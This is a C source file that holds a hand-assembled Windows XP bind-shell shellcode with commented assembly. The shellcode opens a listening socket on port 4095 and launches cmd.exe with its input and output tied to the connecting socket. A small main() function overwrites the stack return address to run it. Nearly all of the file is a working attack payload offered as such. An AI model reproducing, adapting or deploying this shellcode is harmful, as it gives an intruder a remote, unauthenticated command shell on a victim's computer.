// The Dark Raver <darkraver@t0s.org>
// 01/02/2003
// 276 bytes
// - Port: 4095
// - Hardcoded API offsets (Windows XP)
// - Without nulls
// - With ExitThread()

#include <windows.h>


char hell[]=

// ---- Inicializamos ----

"\x55"									/*		push   %ebp						*/
"\x89\xe5"								/*		mov    %esp,%ebp				*/
"\x66\x81\xec\x34\x12"					/*		subw    $0x258,%esp				*/

"\x31\xdb"                   			/*		xor    %ebx,%ebx				*/

// ---- socket + bind + listen + accept ----

// x = 16;
// &x = 0xffffffe4(%ebp)

"\x89\x5d\xe4"							/*		mov    %ebx,0xffffffe4(%ebp)	*/
"\xc6\x45\xe4\x10"						/*		movb   $0x10,0xffffffe4(%ebp)	*/

// WSAStartup(257, &info);
// &info = 0xfffffe68(%ebp)

"\x8d\x85\x68\xfe\xff\xff"				/*		lea    0xfffffe68(%ebp),%eax	*/
"\x50"									/*    	push   %eax						*/
"\x31\xd2"                   			/*		xor    %edx,%edx				*/
"\x66\xba\x01\x01"						/*		mov    $0x101,%dx				*/
"\x52"									/*		push   %edx						*/

// call WSAStartup = 0x71A341DA

"\xb8\xDA\x41\xA3\x71"                	/*		movl   $0x71A341DA,%eax			*/
"\xff\xd0"              				/*		call *%eax						*/

// hDes=WSASocket(2, 1, 0, 0, 0, 0);

"\x53"                      			/*		push   %ebx						*/
"\x53"                      			/*		push   %ebx						*/
"\x53"                      			/*		push   %ebx						*/
"\x53"                      			/*		push   %ebx						*/
"\x6a\x01"								/*   	push   $0x1						*/
"\x6a\x02"								/*   	push   $0x2						*/

// call WSASocket = 0x71A35A01

"\xb8\x01\x5A\xA3\x71"                	/*		movl   $0x71A35A01,%eax			*/
"\xff\xd0"              				/*		call *%eax 						*/

// &hDes=0xfffffe60(%ebp)

"\x89\x85\x60\xfe\xff\xff"				/*		mov    %eax,0xfffffe60(%ebp)	*/

// serv_addr.sin_family = 2;
// &serv_addr = 0xfffffde8(%ebp)

"\x31\xd2"                   			/*		xor    %edx,%edx				*/
"\xb2\x02"                   			/*		mov    $0x2,%dl					*/
"\x66\x89\x95\xe8\xfd\xff\xff"			/*		mov    %dx,0xfffffde8(%ebp)		*/

// serv_addr.sin_port = 65295;

"\x66\xc7\x85\xea\xfd\xff\xff\x0f\xff"	/*		movw   $0xff0f,0xfffffdea(%ebp)	*/

// serv_addr.sin_addr.s_addr = 0;

"\x89\x9d\xec\xfd\xff\xff"				/*		mov    %ebx,0xfffffdec(%ebp)	*/

// hSock = bind(hDes, (struct sockaddr *)&serv_addr, 16);

"\x6a\x10"								/*   	push   $0x10					*/
"\x8d\x85\xe8\xfd\xff\xff"				/* 		lea    0xfffffde8(%ebp),%eax	*/
"\x50"									/*   	push   %eax						*/
"\x8b\x85\x60\xfe\xff\xff"				/*   	mov    0xfffffe60(%ebp),%eax	*/
"\x50"									/*   	push   %eax						*/

// call bind = 0x71A33ECE

"\xb8\xCE\x3E\xA3\x71"                	/*		movl   $0x71A33ECE,%eax	*/
"\xff\xd0"								/*		call *%eax						*/

// hSock = listen(hDes, 5);

"\x6a\x05"								/*   	push   $0x5						*/
"\x8b\x85\x60\xfe\xff\xff"				/*		mov    0xfffffe60(%ebp),%eax	*/
"\x50"									/* 		push   %eax						*/

// call listen = 0x71A35DE2

"\xb8\xE2\x5D\xA3\x71"                	/*		movl   $0x71A35DE2,%eax			*/
"\xff\xd0"								/*		call *%eax						*/

// hSock = accept(hDes, (struct sockaddr *)&serv_addr, &x);

"\x8d\x45\xe4"							/*		lea    0xffffffe4(%ebp),%eax	*/
"\x50"									/*   	push   %eax						*/
"\x8d\x85\xe8\xfd\xff\xff"				/*		lea    0xfffffde8(%ebp),%eax	*/
"\x50"									/*   	push   %eax						*/
"\x8b\x85\x60\xfe\xff\xff"				/*		mov    0xfffffe60(%ebp),%eax	*/
"\x50"									/*   	push   %eax						*/

// call accept = 0x71A3868D

"\xb8\x8D\x86\xA3\x71"                	/*		movl   $0x71A3868D,%eax			*/
"\xff\xd0"              				/*		call *%eax						*/

// &hSock=0xfffffe64(%ebp)

"\x89\x85\x64\xfe\xff\xff"				/*		mov    %eax,0xfffffe64(%ebp)	*/

// ---- Lanzamiento de cmd.exe ----

// memset(&piProcInfo, 0, 16);
// &piProcInfo=0xfffffe48(%ebp)

"\x8d\xbd\x48\xfe\xff\xff"				/*		lea    0xfffffe48(%ebp),%edi	*/
"\x88\xd8"								/*		mov    %bl,%al					*/
"\x31\xc9"								/*		xor    %ecx,%ecx				*/
"\xb1\x16"								/*		mov    $0x16,%cl				*/
"\xf3\xaa"                				/*		repz stos 						*/

// memset(&siStartInfo, 0, 68);
// &siStartInfo= 0xfffffdf8(%ebp)

"\x8d\xbd\xf8\xfd\xff\xff"				/*		lea    0xfffffdf8(%ebp),%edi	*/
"\x88\xd8"								/*		mov    %bl,%al					*/
"\x31\xc9"								/*		xor    %ecx,%ecx				*/
"\xb1\x68"								/*		mov    $0x68,%cl				*/
"\xf3\xaa"                				/*		repz stos 						*/

//siStartInfo.dwFlags = 256 | 1;
//siStartInfo.wShowWindow = 0;
//siStartInfo.hStdOutput = hSock;
//siStartInfo.hStdError = hSock;
//siStartInfo.hStdInput = hSock;

"\x66\xc7\x85\x24\xfe\xff\xff\x01\x01"	/*		movw   $0x101,0xfffffe24(%ebp)	*/
"\x66\x89\x9d\x28\xfe\xff\xff"    		/*		mov    %bx,0xfffffe28(%ebp)		*/
"\x8b\x85\x64\xfe\xff\xff"				/*		mov    0xfffffe64(%ebp),%eax	*/
"\x89\x85\x34\xfe\xff\xff"				/*		mov    %eax,0xfffffe34(%ebp)	*/
"\x89\x85\x38\xfe\xff\xff"				/*		mov    %eax,0xfffffe38(%ebp)	*/
"\x89\x85\x30\xfe\xff\xff"				/*		mov    %eax,0xfffffe30(%ebp)	*/

// CreateProcess(0, "cmd.exe", 0, 0, 1, 0, 0, 0, &siStartInfo, &piProcInfo);

"\x8d\x85\x48\xfe\xff\xff"				/*		lea    0xfffffe48(%ebp),%eax	*/
"\x50"									/*   	push   %eax						*/
"\x8d\x85\xf8\xfd\xff\xff"				/*		lea    0xfffffdf8(%ebp),%eax	*/
"\x50"									/*   	push   %eax						*/
"\x53"                      			/*		push   %ebx						*/
"\x53"                      			/*		push   %ebx						*/
"\x53"                      			/*		push   %ebx						*/
"\x6a\x01"								/*   	push   $0x1						*/
"\x53"                      			/*		push   %ebx						*/
"\x53"                      			/*		push   %ebx						*/

// push &cmd.exe

"\xeb\x02"                   			/*		jmp +2							*/
"\xeb\x0d"								/*		jmp +13							*/
"\xe8\xf9\xff\xff\xff"          		/* 		call   -7						*/
"cmd.exe\x20"							/*		command string					*/

"\x53"                      			/*		push   %ebx						*/

// call CreateProcessA = 0x77E41BB8

"\xb8\xB8\x1B\xE4\x77"                	/*		movl   $0x77E41BB8,%eax			*/
"\xff\xd0"              				/*		call *%eax						*/

// call ExitThread = 0x77E53C49

"\xb8\x49\x3C\xE5\x77"                	/*		movl   $0x77E53C49,%eax			*/
"\xff\xd0"              				/*		call *%eax	*/

""; // TDR




int main()
{
int *ret;

LoadLibraryA("wsock32.dll");

printf("%d\n",strlen(hell));

ret = (int *)&ret + 2;
(*ret) = (int)hell;
}